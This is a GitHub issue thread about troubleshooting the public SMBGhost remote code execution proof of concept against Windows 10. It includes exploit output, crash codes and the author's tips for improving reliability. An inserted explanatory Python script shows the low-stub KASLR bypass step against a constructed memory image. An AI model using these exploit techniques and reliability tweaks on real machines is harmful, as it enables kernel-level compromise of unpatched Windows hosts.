chompie1337 / SMBGhost_RCE_PoC


Win 1909 Enterprise socket timeout #9

Open 0xShkk opened 4 years ago

0xShkk commented 4 years ago

Followup on https://github.com/chompie1337/SMBGhost_RCE_PoC/issues/5#issue-629977267

chompie1337 commented 4 years ago

Hi, how many times have you tried? What is the stop code? Thank you.

MagicNieh commented 4 years ago

Hi. My stop code is "overwrote HalpInterruptController pointer, should have execution shortly...", but I didn't get shell.

0xShkk commented 4 years ago

Hello,

I have tried it 5 times or so. Every time the bluescreen was triggered immediately, without the Python script giving me any output except an immediate timeout (because Windows was down, obviously).

BUT I was trying it again just now and discovered that I had accidentally used Python version 2.7.18, which forces the described crash reliably.

Windows error code:

KMODE EXCEPTION NOT HANDLED

Sorry for confusion!

Then tried it again with python3 about 10 times.

Get this result every time:

```
$ python3 exploit.py -ip 192.168.100.51
[+] found low stub at phys addr 13000!
[+] PML4 at 1aa000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 162
Traceback (most recent call last):
  File "exploit.py", line 466, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 429, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 325, in search_hal_heap
    phys_addr = get_phys_addr(ip, port, index)
  File "exploit.py", line 262, in get_phys_addr
    pte_buff = read_physmem_primitive(ip, port, pte)
  File "exploit.py", line 206, in read_physmem_primitive
    buff = try_read_physmem_primitive(ip, port, phys_addr)
  File "exploit.py", line 221, in try_read_physmem_primitive
    buff = sock.recv(1000)
socket.timeout: timed out
```

0xShkk commented 4 years ago

Got a bluescreen now with correct execution (py3).

Win error:

IRQL NOT LESS OR EQUAL

0xShkk commented 4 years ago

Getting bluescreens reliably now, with the IRQL NOT LESS OR EQUAL error, after the second to fourth execution of exploit.py.

chompie1337 commented 4 years ago

> Hi. My stop code is "overwrote HalpInterruptController pointer, should have execution shortly...", but I didn't get shell.

Did you replace the payload like it says in the README?

MagicNieh commented 4 years ago

Thank you for your reply. I have reproduced it successfully.

Stab1el commented 4 years ago

> Thank you for your reply. I have reproduced it successfully.

Could you please show your successful working environment? I get a read primitive failure on VMware + Win10 1909.

wanghualei2 commented 4 years ago

Hello, I can't find the low_stub. Can you tell me why your code is written this way? Did you study some paper?

wanghualei2 commented 4 years ago

What is the low stub? Why did you write it this way to get it?

MagicNieh commented 4 years ago

> Thank you for your reply. I have reproduced it successfully.
>
> Could you please show your successful working environment? I get a read primitive failure on VMware + Win10 1909.

This exploit code has a low success rate. I tried it more than ten times before it succeeded once.

chompie1337 commented 4 years ago

Reducing the number of processor cores in the VM increases reliability due to the physical read primitive.

chompie1337 commented 4 years ago

> What is the low stub? Why did you write it this way to get it?

I got the idea from Alex Ionescu's research. It is a reliable way to defeat KASLR with only a physical read primitive. It may not be present on all VMs, but I've seen it on most. Here's the talk, relevant portion @ 38 minutes: https://www.youtube.com/watch?v=RSV3f6aEJFY
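To make the low-stub idea concrete, here is an added example that is not part of the SMBGhost_RCE_PoC repository or of any comment in this thread. It scans a constructed physical memory image page by page below 1 MiB for the low stub, checks the candidate with a second heuristic (a kernel-mode pointer at a fixed offset), reads the PML4 physical address out of it, and then locates the PML4 self-reference entry, i.e. the two facts the exploit prints as `found low stub` and `found PML4 self-ref entry` in the output above. The signature value `0x00000001000600E9` with mask `0xffffffffffff00ff`, the kernel-pointer heuristic `& 0xfffff80000000003 == 0xfffff80000000000`, and the offsets 0x70 (kernel pointer) and 0xa0 (PML4) are assumptions taken from the public low-stub technique; this page does not state them. `read_phys_page` stands in for the exploit's network read primitive and simply slices the in-memory image.

```python
"""Added example: locate the low stub and the PML4 self-ref entry with nothing
but a physical read primitive. Not the SMBGhost_RCE_PoC's own code.
Assumed layout (not stated on the page): low stub is page-aligned below 1 MiB,
first qword & 0xffffffffffff00ff == 0x00000001000600E9, kernel pointer at 0x70,
PML4 physical address at 0xa0. The memory image is constructed, not dumped."""
import struct
from typing import Optional, Tuple

PAGE = 0x1000
LOW_STUB_SIG_MASK = 0xffffffffffff00ff   # assumption: ignore the jmp displacement byte
LOW_STUB_SIG = 0x00000001000600E9        # assumption: first qword of the low stub
KERNEL_PTR_MASK = 0xfffff80000000003     # assumption: heuristic for a canonical kernel VA
KERNEL_PTR_VALUE = 0xfffff80000000000
OFF_KERNEL_PTR = 0x70                    # assumption
OFF_PML4 = 0xa0                          # assumption
PFN_MASK = 0x000ffffffffff000            # physical frame bits of a page-table entry


def read_phys_page(image: bytes, phys_addr: int) -> Optional[bytes]:
    """Stand-in for the physical read primitive: one page of the constructed
    image, or None when the read 'fails' (address outside the image)."""
    if phys_addr % PAGE or phys_addr + PAGE > len(image):
        return None
    return image[phys_addr:phys_addr + PAGE]


def looks_like_low_stub(page: bytes) -> bool:
    """Signature match plus a sanity check that offset 0x70 holds a kernel VA."""
    first_qword = struct.unpack_from("<Q", page, 0)[0]
    if first_qword & LOW_STUB_SIG_MASK != LOW_STUB_SIG:
        return False
    kptr = struct.unpack_from("<Q", page, OFF_KERNEL_PTR)[0]
    return kptr & KERNEL_PTR_MASK == KERNEL_PTR_VALUE


def find_low_stub(image: bytes, max_phys: int = 0x100000) -> Optional[Tuple[int, int, int]]:
    """Scan page-aligned physical addresses in [PAGE, max_phys).
    Returns (stub_phys_addr, pml4_phys_addr, kernel_ptr) or None."""
    for phys_addr in range(PAGE, max_phys, PAGE):
        page = read_phys_page(image, phys_addr)
        if page is None or not looks_like_low_stub(page):
            continue
        pml4 = struct.unpack_from("<Q", page, OFF_PML4)[0]
        kptr = struct.unpack_from("<Q", page, OFF_KERNEL_PTR)[0]
        return phys_addr, pml4, kptr
    return None


def find_pml4_self_ref(image: bytes, pml4: int) -> Optional[int]:
    """Index of the PML4 entry whose frame points back at the PML4 itself."""
    page = read_phys_page(image, pml4)
    if page is None:
        return None
    for idx in range(512):
        entry = struct.unpack_from("<Q", page, idx * 8)[0]
        if entry & 1 and entry & PFN_MASK == pml4:
            return idx
    return None


def build_sample_image(stub_addr: int = 0x13000, pml4: int = 0x1aa000,
                       kernel_ptr: int = 0xfffff80312345678, self_ref: int = 162) -> bytes:
    """Constructed 2 MiB image: a decoy page with the signature but no kernel
    pointer, the fake low stub, and a PML4 page with one self-referencing entry."""
    image = bytearray(0x200000)
    struct.pack_into("<Q", image, 0x5000, LOW_STUB_SIG | (0xab << 8))       # decoy
    struct.pack_into("<Q", image, 0x5000 + OFF_KERNEL_PTR, 0x41414141)      # not a kernel VA
    struct.pack_into("<Q", image, stub_addr, LOW_STUB_SIG | (0x42 << 8))    # real stub
    struct.pack_into("<Q", image, stub_addr + OFF_KERNEL_PTR, kernel_ptr)
    struct.pack_into("<Q", image, stub_addr + OFF_PML4, pml4)
    struct.pack_into("<Q", image, pml4 + 0 * 8, 0x1ab063)                   # ordinary entry
    struct.pack_into("<Q", image, pml4 + self_ref * 8, pml4 | 0x63)         # self-reference
    return bytes(image)


if __name__ == "__main__":
    img = build_sample_image()
    hit = find_low_stub(img)
    if hit is None:
        print("[-] low stub not found")
    else:
        addr, pml4, kptr = hit
        print(f"[+] found low stub at phys addr {addr:x}")
        print(f"[+] PML4 at {pml4:x}")
        print(f"[+] found PML4 self-ref entry {find_pml4_self_ref(img, pml4)}")
```

The second heuristic in `looks_like_low_stub` is what keeps a stray page that happens to begin with the signature bytes from being accepted; the decoy at 0x5000 in the constructed image exercises exactly that path. On a real target each `read_phys_page` call is a network round trip through the read primitive, which is why a scan that has to touch many pages is sensitive to the timing issues discussed in this thread.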

wanghualei2 commented 4 years ago

I think your code only succeeds on Win10 with UEFI; I always fail on Win10 with BIOS. Do you have any suggestions?